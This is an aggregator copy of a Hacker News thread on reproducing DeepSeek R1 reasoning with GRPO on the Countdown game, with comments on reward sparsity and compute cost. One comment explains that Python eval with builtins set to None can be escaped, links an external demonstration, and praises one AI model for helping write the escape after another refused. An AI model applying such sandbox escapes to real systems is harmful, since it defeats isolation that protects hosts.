TE
TechEcho
Home24h TopNewestBestAskShowJobs
GitHubTwitter
Home

TechEcho

A tech news platform built with Next.js, providing global tech news and discussions.

GitHubTwitter

Home

HomeNewestBestAskShowJobs

Resources

HackerNews APIOriginal HackerNewsNext.js

© 2025 TechEcho. All rights reserved.

Mini-R1: Reproduce DeepSeek R1 "Aha Moment"

191 pointsby jonbaer4 months ago

7 comments

madars4 months ago
One wonders at which point models will be sneaky enough to bypass simple eval sandboxes. The article has:<p><pre><code> # Evaluate the equation with restricted globals and locals result = eval(equation, {&quot;__builtins__&quot;: None}, {}) </code></pre> but that&#x27;s not enough as you can rebuild access to builtins from objects and then go from there: <a href="https:&#x2F;&#x2F;ideone.com&#x2F;qzNtyu" rel="nofollow">https:&#x2F;&#x2F;ideone.com&#x2F;qzNtyu</a><p>By the way, writing this greatly benefited from DeepThink-r1 while o1 just gave me a lobotomized refusal (CoT: &quot;The user&#x27;s request involves injecting code to bypass a restricted Python environment, suggesting a potential interest in illegal activities. This is a serious matter and aligns closely with ethical guidelines.&quot;). So I just cancelled my ChatGPT subscription - why did we ever put up with this? &quot;This distillation thingie sounds pretty neat!&quot;
评论 #42885743 未加载
评论 #42886074 未加载
mxwsn4 months ago
What&#x27;s surprising about this is how sparsely defined the rewards are. Even if the model learns the formatting reward, if it never chances upon a solution, there isn&#x27;t any feedback&#x2F;reward to push it to learn to solve the game more often.<p>So what are the chances of randomly guessing a solution?<p>The toy Countdown dataset here has 3 to 4 numbers, which are combined with 4 symbols (+, -, x, ÷). With 3 numbers there are 3! * 4^3 = 384 possible symbol combinations, with 4 there are 6144. By the tensorboard log [0], even after just 10 learning steps, the model already has a success rate just below 10%. If we make the simplifying assumption that the model hasn&#x27;t learned anything in 10 steps, then the probability of 1 (or more) success in 80 chances (8 generations are used per step), guessing randomly for a success rate of 1&#x2F;384 on 3-number problems, is 1.9%. One interpretation is to take this as a p-value, and reject that the model&#x27;s base success rate is completely random guessing - the base model already has slightly above chance success rate at solving the 3-number CountDown game.<p>This aligns with my intuition - I suspect that with proper prompting, LLMs should be able to solve CountDown decently OK without any training. Though maybe not a 3B model?<p>The model likely &quot;parlays&quot; its successes on 3 numbers to start to learn to solve 4 numbers. Or has it? The final learned ~50% success rate matches the frequency of 4-number problems in Jiayi Pan&#x27;s CountDown dataset [1]. Phil does provide examples of successful 4-number solutions, but maybe the model hasn&#x27;t become consistent at 4 numbers yet.<p>[0]: <a href="https:&#x2F;&#x2F;www.philschmid.de&#x2F;static&#x2F;blog&#x2F;mini-deepseek-r1&#x2F;tensorboard-r1.png" rel="nofollow">https:&#x2F;&#x2F;www.philschmid.de&#x2F;static&#x2F;blog&#x2F;mini-deepseek-r1&#x2F;tenso...</a> [1]: <a href="https:&#x2F;&#x2F;huggingface.co&#x2F;datasets&#x2F;Jiayi-Pan&#x2F;Countdown-Tasks-3to4&#x2F;viewer&#x2F;default&#x2F;train?f[nums][min]=3&amp;f[nums][max]=4&amp;f[nums][transform]=length" rel="nofollow">https:&#x2F;&#x2F;huggingface.co&#x2F;datasets&#x2F;Jiayi-Pan&#x2F;Countdown-Tasks-3t...</a>
评论 #42885754 未加载
singularity20014 months ago
&quot;Conclusion<p>The release of DeepSeek R1 and its research paper might be breakpoint for the open-science and open-source development. Just a week after DeepSeek release, we&#x27;ve been able to reproduce a simple version of R1 learned &quot;reasoning&quot; using GRPO and the Countdown Game. While our implementation focuses on a specific task rather than general reasoning and convergence into a very specific &quot;reasoning&quot; format, it shows that the method is working.<p>In our mini R1 experiment we used GRPO, with two rule-based reward but already required significant compute: 4 H100 GPUs running for 6 hours to complete just 450 training steps on a 3B parameter model.&quot;
thorum4 months ago
I was getting pretty hyped about the potential for GRPO in my own projects until you said 20 minutes for a single training step with batch size 1! Is that likely to improve?
评论 #42885275 未加载
评论 #42885296 未加载
yurlungur4 months ago
<a href="https:&#x2F;&#x2F;github.com&#x2F;Jiayi-Pan&#x2F;TinyZero">https:&#x2F;&#x2F;github.com&#x2F;Jiayi-Pan&#x2F;TinyZero</a> what about this one?
评论 #42886580 未加载
rmrf1004 months ago
this is really cool!
moonshotideas4 months ago
Wow!